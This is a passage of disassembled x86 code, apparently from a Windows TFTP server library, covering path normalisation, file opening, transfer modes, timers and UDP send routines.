cmp al, 2Fh
jz short loc_10026CB
mov byte ptr [esi], 5Ch
inc esi
loc_10026CB: ; CODE XREF: sub_100261E+9C�j
; sub_100261E+A3�j ...
inc ecx
jz short loc_10026D8
mov al, [ecx]
cmp al, 5Ch
jz short loc_10026CB
cmp al, 2Fh
jz short loc_10026CB
loc_10026D8: ; CODE XREF: sub_100261E+AE�j
mov [ebp+arg_0], esi
jmp loc_1002642
; ---------------------------------------------------------------------------
loc_10026E0: ; CODE XREF: sub_100261E+6C�j
xor eax, eax
jmp short loc_10026FC
; ---------------------------------------------------------------------------
loc_10026E4: ; CODE XREF: sub_100261E+28�j
mov cl, [esi-1]
lea eax, [esi-1]
cmp cl, 5Ch
jz short loc_10026F4
cmp cl, 2Fh
jnz short loc_10026F6
loc_10026F4: ; CODE XREF: sub_100261E+CF�j
mov esi, eax
loc_10026F6: ; CODE XREF: sub_100261E+D4�j
and byte ptr [esi], 0
push 1
pop eax
loc_10026FC: ; CODE XREF: sub_100261E+C4�j
pop edi
pop esi
pop ebx
pop ebp
retn 4
; ---------------------------------------------------------------------------
loc_1002703: ; CODE XREF: sub_100261E+50�j
; sub_100261E+64�j ...
mov [esi], al
mov al, [ecx+1]
inc esi
inc ecx
test al, al
jz short loc_100269C
cmp al, 5Ch
jz short loc_100269C
cmp al, 2Fh
jnz short loc_1002703
jmp short loc_100269C
; ---------------------------------------------------------------------------
loc_1002718: ; CODE XREF: sub_100261E+3F�j
; sub_100261E+48�j
mov ecx, edi
jmp short loc_100269C
; ---------------------------------------------------------------------------
loc_100271C: ; CODE XREF: sub_100261E+30�j
; sub_100261E+11D�j
test al, al
jz loc_100269C
cmp al, 5Ch
jz loc_100269C
cmp al, 2Fh
jz loc_100269C
mov [esi], al
mov al, [ecx+1]
inc esi
inc ecx
jmp short loc_100271C
sub_100261E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100273D proc near ; CODE XREF: sub_1002F31+18C�p
; sub_100333A+197�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, esi
or ecx, 0FFFFFFFFh
xor eax, eax
mov edx, [ebp+arg_0]
repne scasb
not ecx
dec ecx
mov edi, edx
mov ebx, ecx
or ecx, 0FFFFFFFFh
repne scasb
not ecx
dec ecx
cmp byte ptr [ebx+esi-1], 5Ch
mov edi, ecx
setz al
xor ecx, ecx
cmp byte ptr [edx], 5Ch
setz cl
test eax, eax
jnz short loc_1002784
test ecx, ecx
jnz short loc_1002784
mov [ebp+arg_8], 1
jmp short loc_1002791
; ---------------------------------------------------------------------------
loc_1002784: ; CODE XREF: sub_100273D+38�j
; sub_100273D+3C�j
and [ebp+arg_8], 0
test eax, eax
jz short loc_1002791
test ecx, ecx
jz short loc_1002791
dec ebx
loc_1002791: ; CODE XREF: sub_100273D+45�j
; sub_100273D+4D�j ...
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_4]
add eax, edi
add eax, ebx
dec ecx
cmp eax, ecx
jbe short loc_10027A4
xor eax, eax
jmp short loc_10027DA
; ---------------------------------------------------------------------------
loc_10027A4: ; CODE XREF: sub_100273D+61�j
mov eax, [ebp+arg_8]
inc edi
add eax, ebx
push edi
add eax, edx
push edx
push eax
call dword_1001144 ; memmove
mov eax, [ebp+arg_0]
mov ecx, ebx
mov edx, ecx
mov edi, eax
shr ecx, 2
rep movsd
mov ecx, edx
add esp, 0Ch
and ecx, 3
cmp [ebp+arg_8], 0
rep movsb
jz short loc_10027D7
mov byte ptr [ebx+eax], 5Ch
loc_10027D7: ; CODE XREF: sub_100273D+94�j
push 1
pop eax
loc_10027DA: ; CODE XREF: sub_100273D+65�j
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_100273D endp
; =============== S U B R O U T I N E =======================================
sub_10027E1 proc near ; CODE XREF: sub_1002B5E+C7�p
; sub_1002F31+36B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
mov ecx, [esi+10024h]
lea eax, [esi+10024h]
test ecx, ecx
jz short loc_1002817
and dword ptr [eax], 0
mov eax, [esp+8+arg_4]
and word ptr [esi+10014h], 0
mov [esi+10020h], ecx
mov eax, [eax+20h]
mov [esi+1001Ch], eax
jmp short loc_1002877
; ---------------------------------------------------------------------------
loc_1002817: ; CODE XREF: sub_10027E1+14�j
mov edi, dword_1001104
push 3
call edi ; dword_1001104
mov [esi+38h], ax
mov ax, [esi+10014h]
push eax
call edi ; dword_1001104
mov [esi+3Ah], ax
mov eax, [esp+8+arg_4]
push dword ptr [eax+20h]
lea eax, [esi+3Ch]
push eax
push dword ptr [esi+1002Ch]
call dword_1001090 ; _read
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [esi+1001Ch], eax
jnz short loc_100286E
mov esi, dword_10010AC
call esi ; dword_10010AC
call esi ; dword_10010AC
push dword ptr [eax]
call dword_100102C ; RtlSetLastWin32Error
xor eax, eax
jmp short loc_100287A
; ---------------------------------------------------------------------------
loc_100286E: ; CODE XREF: sub_10027E1+75�j
add eax, 4
mov [esi+10020h], eax
loc_1002877: ; CODE XREF: sub_10027E1+34�j
push 1
pop eax
loc_100287A: ; CODE XREF: sub_10027E1+8B�j
pop edi
pop esi
retn 8
sub_10027E1 endp
; =============== S U B R O U T I N E =======================================
sub_100287F proc near ; CODE XREF: sub_1002F31+2C6�p
; sub_100333A+2CD�p
arg_0 = dword ptr 4
push esi
mov esi, offset dword_1006080
push esi
call dword_1001058 ; RtlEnterCriticalSection
mov ecx, dword_1006098
push esi
mov eax, [esp+8+arg_0]
mov [eax], ecx
mov dword ptr [eax+4], offset dword_1006098
mov [ecx+4], eax
mov dword_1006098, eax
call dword_100104C ; RtlLeaveCriticalSection
push 1
pop eax
pop esi
retn 4
sub_100287F endp
; =============== S U B R O U T I N E =======================================
sub_10028B5 proc near ; CODE XREF: sub_1002A3D+C�p
; sub_1002EC8+8�p ...
arg_0 = dword ptr 4
push ebx
mov ebx, dword_1001058
push esi
push edi
mov edi, offset dword_1006080
push edi
call ebx ; dword_1001058
mov eax, dword_1006098
mov ecx, offset dword_1006098
loc_10028D0: ; CODE XREF: sub_10028B5+2D�j
cmp eax, ecx
jz short loc_10028F2
mov edx, [eax+8]
lea esi, [eax-18h]
cmp edx, [esp+0Ch+arg_0]
jz short loc_10028E4
mov eax, [eax]
jmp short loc_10028D0
; ---------------------------------------------------------------------------
loc_10028E4: ; CODE XREF: sub_10028B5+29�j
push esi
call ebx ; dword_1001058
push edi
call dword_100104C ; RtlLeaveCriticalSection
mov eax, esi
jmp short loc_10028FB
; ---------------------------------------------------------------------------
loc_10028F2: ; CODE XREF: sub_10028B5+1D�j
push edi
call dword_100104C ; RtlLeaveCriticalSection
xor eax, eax
loc_10028FB: ; CODE XREF: sub_10028B5+3B�j
pop edi
pop esi
pop ebx
retn 4
sub_10028B5 endp
; =============== S U B R O U T I N E =======================================
sub_1002901 proc near ; CODE XREF: sub_100297A+A�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+20h]
cmp eax, 0FFFFFFFFh
jz short loc_1002915
push eax
call dword_100111C ; closesocket
loc_1002915: ; CODE XREF: sub_1002901+B�j
mov eax, [esi+10004h]
test eax, eax
jz short loc_100292E
push 0
push eax
push dword_10060A0
call dword_1001158 ; RtlDeleteTimer
loc_100292E: ; CODE XREF: sub_1002901+1C�j
push 0
push dword ptr [esi+0FFFCh]
call dword_1001168 ; RtlDeregisterWaitEx
push dword ptr [esi+0FFF8h]
call dword_1001054 ; CloseHandle
push esi
call dword_1001028 ; RtlDeleteCriticalSection
pop esi
retn 4
sub_1002901 endp
; =============== S U B R O U T I N E =======================================
sub_1002953 proc near ; CODE XREF: sub_100297A+2F�p
; sub_100297A+37�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+1002Ch]
cmp eax, 0FFFFFFFFh
jz short loc_100296B
push eax
call dword_100108C ; _close
pop ecx
loc_100296B: ; CODE XREF: sub_1002953+E�j
push esi
call dword_10010A0 ; free
pop ecx
pop esi
retn 4
sub_1002953 endp
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_100297A proc near ; CODE XREF: sub_10029BA+55�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_10029B6
push esi
call sub_1002901
mov eax, [esi+24h]
dec eax
jz short loc_10029B0
dec eax
jz short loc_10029A8
dec eax
jz short loc_10029A0
dec eax
jnz short loc_10029B6
push esi
call nullsub_1
jmp short loc_10029B6
; ---------------------------------------------------------------------------
loc_10029A0: ; CODE XREF: sub_100297A+19�j
push esi
call nullsub_1
jmp short loc_10029B6
; ---------------------------------------------------------------------------
loc_10029A8: ; CODE XREF: sub_100297A+16�j
push esi
call sub_1002953
jmp short loc_10029B6
; ---------------------------------------------------------------------------
loc_10029B0: ; CODE XREF: sub_100297A+13�j
push esi
call sub_1002953
loc_10029B6: ; CODE XREF: sub_100297A+7�j
; sub_100297A+1C�j ...
pop esi
retn 4
sub_100297A endp
; =============== S U B R O U T I N E =======================================
sub_10029BA proc near ; DATA XREF: sub_10018DB+98�o
push ebx
mov ebx, dword_1001058
push esi
push offset dword_1006080
call ebx ; dword_1001058
mov esi, dword_1006098
cmp esi, offset dword_1006098
jz short loc_1002A28
push edi
push ebp
loc_10029D9: ; CODE XREF: sub_10029BA+6A�j
lea edi, [esi-18h]
push edi
call ebx ; dword_1001058
mov ebp, [esi]
inc dword ptr [edi+10008h]
cmp dword ptr [edi+10008h], 4
lea eax, [edi+10008h]
push edi
jb short loc_1002A16
call ebx ; dword_1001058
mov eax, [esi]
mov esi, [esi+4]
mov [esi], eax
mov [eax+4], esi
mov ax, [edi+2Ah]
push eax
call dword_1001104 ; ntohs
push edi
call sub_100297A
jmp short loc_1002A1C
; ---------------------------------------------------------------------------
loc_1002A16: ; CODE XREF: sub_10029BA+3B�j
call dword_100104C ; RtlLeaveCriticalSection
loc_1002A1C: ; CODE XREF: sub_10029BA+5A�j
cmp ebp, offset dword_1006098
mov esi, ebp
jnz short loc_10029D9
pop ebp
pop edi
loc_1002A28: ; CODE XREF: sub_10029BA+1B�j
push offset dword_1006080
call dword_100104C ; RtlLeaveCriticalSection
call sub_1001A1F
pop esi
pop ebx
retn 8
sub_10029BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1002A3D proc near ; DATA XREF: sub_1002F31+341�o
; sub_100333A+32C�o
var_10 = byte ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_10028B5
mov esi, eax
xor ebx, ebx
cmp esi, ebx
jz loc_1002B57
mov eax, [esi+1000Ch]
cmp eax, 0Ah
jnb loc_1002B0B
cmp eax, 5
jbe short loc_1002A8E
lea eax, [ebp+var_10]
push eax
call dword_1001024 ; GetLocalTime
mov ax, [esi+2Ah]
push eax
call dword_100110C ; ntohs
mov ax, [esi+3Ah]
push eax
call dword_1001104 ; ntohs
loc_1002A8E: ; CODE XREF: sub_1002A3D+2F�j
lea eax, [esi+28h]
push 10h
push eax
push ebx
push dword ptr [esi+10020h]
lea eax, [esi+38h]
push eax
push dword ptr [esi+20h]
call dword_1001130 ; sendto
cmp eax, 0FFFFFFFFh
jnz short loc_1002AB3
call dword_10010F8 ; WSAGetLastError
loc_1002AB3: ; CODE XREF: sub_1002A3D+6E�j
mov edi, [esi+10004h]
inc dword ptr [esi+1000Ch]
cmp edi, ebx
jz loc_1002B4C
cmp [esi+10028h], ebx
jnz short loc_1002AEA
mov eax, [esi+10000h]
lea ecx, [esi+10000h]
shl eax, 1
mov edx, 2710h
mov [ecx], eax
cmp eax, edx
jbe short loc_1002AEA
mov [ecx], edx
loc_1002AEA: ; CODE XREF: sub_1002A3D+90�j
; sub_1002A3D+A9�j
mov eax, [esi+10000h]
push eax
push eax
push edi
push dword_10060A0
call dword_1001154 ; RtlUpdateTimer
cmp eax, ebx
jz short loc_1002B4C
call dword_1001038 ; RtlGetLastWin32Error
jmp short loc_1002B4C
; ---------------------------------------------------------------------------
loc_1002B0B: ; CODE XREF: sub_1002A3D+26�j
cmp esi, ebx
jz short loc_1002B57
push offset aTimeout ; "Timeout"
push ebx
push dword ptr [esi+20h]
lea eax, [esi+28h]
push ebx
push eax
call sub_100230A
mov eax, [esi+10004h]
lea edi, [esi+10004h]
cmp eax, ebx
jz short loc_1002B40
push ebx
push eax
push dword_10060A0
call dword_1001158 ; RtlDeleteTimer
loc_1002B40: ; CODE XREF: sub_1002A3D+F3�j
mov [edi], ebx
mov dword ptr [esi+10008h], 4
loc_1002B4C: ; CODE XREF: sub_1002A3D+84�j
; sub_1002A3D+C4�j ...
cmp esi, ebx
jz short loc_1002B57
push esi
call dword_100104C ; RtlLeaveCriticalSection
loc_1002B57: ; CODE XREF: sub_1002A3D+17�j
; sub_1002A3D+D0�j ...
pop edi
pop esi
pop ebx
leave
retn 8
sub_1002A3D endp
; =============== S U B R O U T I N E =======================================
sub_1002B5E proc near ; CODE XREF: sub_1002EC8+3D�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ecx
push ebx
mov ebx, dword_100110C
push ebp
push esi
mov esi, [esp+10h+arg_0]
push edi
mov edi, [esp+14h+arg_4]
xor ebp, ebp
mov eax, [esi+10018h]
push 4
mov [esp+18h+var_4], ebp
mov [edi+20h], eax
call ebx ; dword_100110C
cmp [edi+34h], ax
jnz short loc_1002BA6
mov ax, [esi+10014h]
push eax
call ebx ; dword_100110C
cmp [edi+36h], ax
jnz short loc_1002BA6
and dword ptr [esi+1000Ch], 0
push 1
pop ebp
jmp short loc_1002BCE
; ---------------------------------------------------------------------------
loc_1002BA6: ; CODE XREF: sub_1002B5E+2A�j
; sub_1002B5E+3A�j
mov ax, [edi+36h]
push eax
call ebx ; dword_100110C
mov ax, [edi+34h]
push eax
call dword_1001104 ; ntohs
push 4
call ebx ; dword_100110C
cmp [edi+34h], ax
jnz short loc_1002BCE
mov ax, [esi+10014h]
dec ax
push eax
call ebx ; dword_100110C
loc_1002BCE: ; CODE XREF: sub_1002B5E+46�j
; sub_1002B5E+62�j
test ebp, ebp
jz loc_1002C96
cmp dword ptr [esi+10030h], 0
jz short loc_1002C1C
mov eax, [esi+10004h]
lea edi, [esi+10004h]
test eax, eax
jz short loc_1002BFE
push 0
push eax
push dword_10060A0
call dword_1001158 ; RtlDeleteTimer
loc_1002BFE: ; CODE XREF: sub_1002B5E+8F�j
and dword ptr [edi], 0
mov dword ptr [esi+10008h], 4
loc_1002C0B: ; CODE XREF: sub_1002B5E+DB�j
; sub_1002B5E+13E�j ...
push esi
call dword_100104C ; RtlLeaveCriticalSection
xor eax, eax
loc_1002C14: ; CODE XREF: sub_1002B5E+183�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn 8
; ---------------------------------------------------------------------------
loc_1002C1C: ; CODE XREF: sub_1002B5E+7F�j
inc word ptr [esi+10014h]
push edi
push esi
call sub_10027E1
mov ebp, eax
xor eax, eax
cmp ebp, eax
jnz short loc_1002C3B
mov ax, [edi+0Eh]
push eax
call ebx ; dword_100110C
jmp short loc_1002C0B
; ---------------------------------------------------------------------------
loc_1002C3B: ; CODE XREF: sub_1002B5E+D2�j
cmp [esi+10028h], eax
mov [esi+1000Ch], eax
mov [esi+10008h], eax
jnz short loc_1002C59
mov dword ptr [esi+10000h], 3E8h
loc_1002C59: ; CODE XREF: sub_1002B5E+EF�j
mov ecx, [esi+10004h]
cmp ecx, eax
jz short loc_1002C78
mov eax, [esi+10000h]
push eax
push eax
push ecx
push dword_10060A0
call dword_1001154 ; RtlUpdateTimer
loc_1002C78: ; CODE XREF: sub_1002B5E+103�j
mov eax, [esi+1001Ch]
cmp eax, [edi+20h]
jnb short loc_1002C9A
mov ax, [edi+0Eh]
push eax
call ebx ; dword_100110C
mov dword ptr [esi+10030h], 1
jmp short loc_1002C9A
; ---------------------------------------------------------------------------
loc_1002C96: ; CODE XREF: sub_1002B5E+72�j
mov ebp, [esp+14h+var_4]
loc_1002C9A: ; CODE XREF: sub_1002B5E+123�j
; sub_1002B5E+136�j
test ebp, ebp
jz loc_1002C0B
mov ax, [edi+0Eh]
push eax
call ebx ; dword_100110C
add edi, 0Ch
push 10h
push edi
push 0
push dword ptr [esi+10020h]
lea eax, [esi+38h]
push eax
push dword ptr [esi+20h]
call dword_1001130 ; sendto
cmp eax, 0FFFFFFFFh
jnz loc_1002C0B
call dword_10010F8 ; WSAGetLastError
test esi, esi
jz short loc_1002CDE
push esi
call dword_100104C ; RtlLeaveCriticalSection
loc_1002CDE: ; CODE XREF: sub_1002B5E+177�j
push 1
pop eax
jmp loc_1002C14
sub_1002B5E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1002CE6 proc near ; CODE XREF: sub_1002EC8+34�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push ebx
mov ebx, dword_100110C
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
push 3
mov eax, [esi+10018h]
mov [edi+20h], eax
call ebx ; dword_100110C
cmp [edi+34h], ax
jnz short loc_1002D3A
mov ax, [esi+10014h]
inc ax
push eax
call ebx ; dword_100110C
cmp [edi+36h], ax
jnz short loc_1002D3A
inc word ptr [esi+10014h]
xor ebx, ebx
mov [ebp+var_4], 1
mov [esi+10008h], ebx
jmp short loc_1002D9D
; ---------------------------------------------------------------------------
loc_1002D3A: ; CODE XREF: sub_1002CE6+28�j
; sub_1002CE6+3A�j
push 3
call ebx ; dword_100110C
cmp [edi+34h], ax
jnz short loc_1002D9B
mov ax, [esi+10014h]
push eax
call ebx ; dword_100110C
cmp [edi+36h], ax
jnz short loc_1002D9B
mov ebx, dword_1001104
push 4
call ebx ; dword_1001104
mov [esi+38h], ax
mov ax, [esi+10014h]
push eax
call ebx ; dword_1001104
add edi, 0Ch
push 10h
mov [esi+3Ah], ax
push edi
push 0
lea eax, [esi+38h]
push 4
push eax
push dword ptr [esi+20h]
call dword_1001130 ; sendto
cmp eax, 0FFFFFFFFh
jnz loc_1002EB3
call dword_10010F8 ; WSAGetLastError
jmp loc_1002EB3
; ---------------------------------------------------------------------------
loc_1002D9B: ; CODE XREF: sub_1002CE6+5C�j
; sub_1002CE6+6C�j
xor ebx, ebx
loc_1002D9D: ; CODE XREF: sub_1002CE6+52�j
cmp [ebp+var_4], ebx
jz short loc_1002DE4
lea eax, [ebp+arg_4]
push eax
mov eax, [edi+2Ch]
push dword ptr [esi+10030h]
sub eax, 4
push eax
lea eax, [edi+38h]
push eax
push dword ptr [esi+1002Ch]
call sub_100373A
cmp [ebp+var_4], ebx
mov [ebp+arg_0], eax
jz short loc_1002DE4
cmp eax, ebx
jge short loc_1002DF7
push ebx
push 3
push dword ptr [edi+8]
lea eax, [edi+0FFF1h]
add edi, 0Ch
push eax
push edi
call sub_100230A
loc_1002DE4: ; CODE XREF: sub_1002CE6+BA�j
; sub_1002CE6+E2�j
cmp esi, ebx
jz short loc_1002DEF
push esi
call dword_100104C ; RtlLeaveCriticalSection
loc_1002DEF: ; CODE XREF: sub_1002CE6+100�j
push 1
pop eax
jmp loc_1002EBC
; ---------------------------------------------------------------------------
loc_1002DF7: ; CODE XREF: sub_1002CE6+E6�j
mov eax, [edi+2Ch]
sub eax, 4
cmp eax, [edi+20h]
ja loc_1002EB3
mov ebx, dword_1001104
push 4
call ebx ; dword_1001104
mov [esi+38h], ax
mov ax, [esi+10014h]
push eax
call ebx ; dword_1001104
mov [esi+3Ah], ax
lea eax, [edi+0Ch]
push 10h
xor ebx, ebx
push eax
push ebx
lea eax, [esi+38h]
push 4
push eax
push dword ptr [esi+20h]
call dword_1001130 ; sendto
mov [ebp+arg_0], eax
mov eax, [esi+10004h]
cmp eax, ebx
jz short loc_1002E74
cmp [esi+10028h], ebx
mov [esi+1000Ch], ebx
jnz short loc_1002E5F
mov dword ptr [esi+10000h], 3E8h
loc_1002E5F: ; CODE XREF: sub_1002CE6+16D�j
mov ecx, [esi+10000h]
push ecx
push ecx
push eax
push dword_10060A0
call dword_1001154 ; RtlUpdateTimer
loc_1002E74: ; CODE XREF: sub_1002CE6+15F�j
cmp [ebp+arg_0], 0FFFFFFFFh
jnz short loc_1002E80
call dword_10010F8 ; WSAGetLastError
loc_1002E80: ; CODE XREF: sub_1002CE6+192�j
mov eax, [edi+2Ch]
sub eax, 4
cmp eax, [edi+20h]
jnb short loc_1002EB3
mov eax, [esi+10004h]
cmp eax, ebx
jz short loc_1002EA3
push ebx
push eax
push dword_10060A0
call dword_1001158 ; RtlDeleteTimer
loc_1002EA3: ; CODE XREF: sub_1002CE6+1AD�j
mov [esi+10004h], ebx
mov dword ptr [esi+10008h], 4
loc_1002EB3: ; CODE XREF: sub_1002CE6+A4�j
; sub_1002CE6+B0�j ...
push esi
call dword_100104C ; RtlLeaveCriticalSection
xor eax, eax
loc_1002EBC: ; CODE XREF: sub_1002CE6+10C�j
pop edi
pop esi
pop ebx
leave
retn 8
sub_1002CE6 endp
; =============== S U B R O U T I N E =======================================
sub_1002EC3 proc near ; CODE XREF: sub_1002EC8+22�p
; sub_1002EC8+2B�p
xor eax, eax
retn 8
sub_1002EC3 endp
; =============== S U B R O U T I N E =======================================
sub_1002EC8 proc near ; CODE XREF: sub_1001A91+254�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+8]
call sub_10028B5
test eax, eax
jz short loc_1002F0A
mov ecx, [eax+24h]
dec ecx
jz short loc_1002F03
dec ecx
jz short loc_1002EFA
dec ecx
jz short loc_1002EF1
dec ecx
jnz short loc_1002F0A
push esi
push eax
call sub_1002EC3
jmp short loc_1002F0A
; ---------------------------------------------------------------------------
loc_1002EF1: ; CODE XREF: sub_1002EC8+1B�j
push esi
push eax
call sub_1002EC3
jmp short loc_1002F0A
; ---------------------------------------------------------------------------
loc_1002EFA: ; CODE XREF: sub_1002EC8+18�j
push esi
push eax
call sub_1002CE6
jmp short loc_1002F0A
; ---------------------------------------------------------------------------
loc_1002F03: ; CODE XREF: sub_1002EC8+15�j
push esi
push eax
call sub_1002B5E
loc_1002F0A: ; CODE XREF: sub_1002EC8+F�j
; sub_1002EC8+1E�j ...
pop esi
retn 4
sub_1002EC8 endp
; =============== S U B R O U T I N E =======================================
sub_1002F0E proc near ; CODE XREF: sub_1002F31+20�p
; sub_100333A+41�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
xor eax, eax
cmp [esp+arg_4], eax
jbe short loc_1002F27
loc_1002F16: ; CODE XREF: sub_1002F0E+17�j
mov ecx, [esp+arg_0]
cmp byte ptr [eax+ecx], 0
jz short loc_1002F2C
inc eax
cmp eax, [esp+arg_4]
jb short loc_1002F16
loc_1002F27: ; CODE XREF: sub_1002F0E+6�j
xor eax, eax
locret_1002F29: ; CODE XREF: sub_1002F0E+21�j
retn 8
; ---------------------------------------------------------------------------
loc_1002F2C: ; CODE XREF: sub_1002F0E+10�j
push 1
pop eax
jmp short locret_1002F29
sub_1002F0E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1002F31 proc near ; CODE XREF: sub_1001A91+223�p
; DATA XREF: sub_1001A91+1FC�o
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push ebx
and [ebp+var_10], 0
and [ebp+var_14], 0
push esi
mov esi, [ebp+arg_0]
push edi
push 0FFBAh
lea ebx, [esi+36h]
push ebx
mov [ebp+var_18], ebx
call sub_1002F0E
test eax, eax
jz loc_100330F
mov edi, ebx
or ecx, 0FFFFFFFFh
xor eax, eax
push 10034h
repne scasb
not ecx
dec ecx
lea eax, [ecx+ebx+1]
mov [ebp+var_4], eax
call dword_1001094 ; malloc
mov ebx, eax
pop ecx
test ebx, ebx
jz loc_1003331
mov ecx, 400Dh
xor eax, eax
mov edi, ebx
rep stosd
push dword ptr [esi+10h]
call dword_1001120 ; inet_ntoa
mov [ebp+var_8], eax
mov ax, [esi+0Eh]
push eax
call dword_1001104 ; ntohs
mov edi, [ebp+var_4]
mov [ebp+var_C], edi
mov al, [edi]
test al, al
jz short loc_1002FCD
loc_1002FB5: ; CODE XREF: sub_1002F31+97�j
movsx eax, al
push eax
call dword_1001150 ; tolower
mov [edi], al
mov al, [edi+1]
inc edi
pop ecx
test al, al
jnz short loc_1002FB5
mov [ebp+var_C], edi
loc_1002FCD: ; CODE XREF: sub_1002F31+82�j
mov edi, [ebp+var_4]
mov eax, offset aNetascii ; "netascii"
loc_1002FD5: ; CODE XREF: sub_1002F31+C0�j
mov dl, [edi]
mov cl, dl
cmp dl, [eax]
jnz short loc_1002FF7
test cl, cl
jz short loc_1002FF3
mov dl, [edi+1]
mov cl, dl
cmp dl, [eax+1]
jnz short loc_1002FF7
inc edi
inc edi
inc eax
inc eax
test cl, cl
jnz short loc_1002FD5
loc_1002FF3: ; CODE XREF: sub_1002F31+AE�j
xor eax, eax
jmp short loc_1002FFC
; ---------------------------------------------------------------------------
loc_1002FF7: ; CODE XREF: sub_1002F31+AA�j
; sub_1002F31+B8�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_1002FFC: ; CODE XREF: sub_1002F31+C4�j
test eax, eax
jz short loc_1003037
mov edi, [ebp+var_4]
mov eax, offset aOctet ; "octet"
loc_1003008: ; CODE XREF: sub_1002F31+F3�j
mov dl, [edi]
mov cl, dl
cmp dl, [eax]
jnz short loc_100302A
test cl, cl
jz short loc_1003026
mov dl, [edi+1]
mov cl, dl
cmp dl, [eax+1]
jnz short loc_100302A
inc edi
inc edi
inc eax
inc eax
test cl, cl
jnz short loc_1003008
loc_1003026: ; CODE XREF: sub_1002F31+E1�j
xor eax, eax
jmp short loc_100302F
; ---------------------------------------------------------------------------
loc_100302A: ; CODE XREF: sub_1002F31+DD�j
; sub_1002F31+EB�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_100302F: ; CODE XREF: sub_1002F31+F7�j
test eax, eax
jnz loc_10032F6
loc_1003037: ; CODE XREF: sub_1002F31+CD�j
mov edi, [ebp+var_18]
or ecx, 0FFFFFFFFh
xor eax, eax
lea edx, [esi+1FFADh]
repne scasb
not ecx
sub edi, ecx
push edx
mov eax, ecx
mov esi, edi
mov edi, edx
mov [ebp+var_4], edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
call sub_100261E
test eax, eax
jnz short loc_1003071
push offset aMalformedFileN ; "Malformed file name"
jmp short loc_10030CB
; ---------------------------------------------------------------------------
loc_1003071: ; CODE XREF: sub_1002F31+137�j
push [ebp+var_8]
push offset dword_1005CE8
call sub_10039D6
test eax, eax
jnz short loc_1003093
push [ebp+var_8]
push offset dword_1005D20
call sub_10039D6
test eax, eax
jz short loc_10030A4
loc_1003093: ; CODE XREF: sub_1002F31+14F�j
push [ebp+var_4]
push offset dword_1005D58
call sub_10039D6
test eax, eax
jnz short loc_10030B0
loc_10030A4: ; CODE XREF: sub_1002F31+160�j
call dword_10010AC ; _errno
push 0
push 2
jmp short loc_1003100
; ---------------------------------------------------------------------------
loc_10030B0: ; CODE XREF: sub_1002F31+171�j
push (offset dword_1005E07+1)
push 0FFBCh
push [ebp+var_4]
call sub_100273D
test eax, eax
jnz short loc_10030CF
push offset aFileNameTooLon ; "File name too long"
loc_10030CB: ; CODE XREF: sub_1002F31+13E�j
push 0
jmp short loc_1003100
; ---------------------------------------------------------------------------
loc_10030CF: ; CODE XREF: sub_1002F31+193�j
push 8000h
push [ebp+var_4]
call dword_10010E4 ; _open
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebx+1002Ch], eax
jnz short loc_1003116
mov esi, dword_10010AC
call esi ; dword_10010AC
push dword ptr [eax]
call dword_100102C ; RtlSetLastWin32Error
call esi ; dword_10010AC
push 0
push 1
loc_1003100: ; CODE XREF: sub_1002F31+17D�j
; sub_1002F31+19C�j
mov eax, [ebp+arg_0]
push dword ptr [eax+8]
lea ecx, [eax+0FFF1h]
add eax, 0Ch
push ecx
push eax
jmp loc_1003308
; ---------------------------------------------------------------------------
loc_1003116: ; CODE XREF: sub_1002F31+1B7�j
mov edi, dword_1001088
push 2
push 0
push eax
call edi ; dword_1001088
mov esi, [ebp+arg_0]
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_1003140
push 0
push 0
mov [esi+24h], eax
push dword ptr [ebx+1002Ch]
call edi ; dword_1001088
add esp, 0Ch
loc_1003140: ; CODE XREF: sub_1002F31+1FB�j
cmp eax, 0FFFFFFFFh
jnz short loc_1003159
mov edi, dword_10010AC
call edi ; dword_10010AC
call edi ; dword_10010AC
push dword ptr [eax]
call dword_100102C ; RtlSetLastWin32Error
jmp short loc_1003197
; ---------------------------------------------------------------------------
loc_1003159: ; CODE XREF: sub_1002F31+212�j
push 0
push 2
push 2
call dword_100112C ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jz short loc_1003191
mov eax, [esi+1Ch]
and [ebp+var_26], 0
mov [ebp+var_24], eax
lea eax, [ebp+var_28]
push 10h
push eax
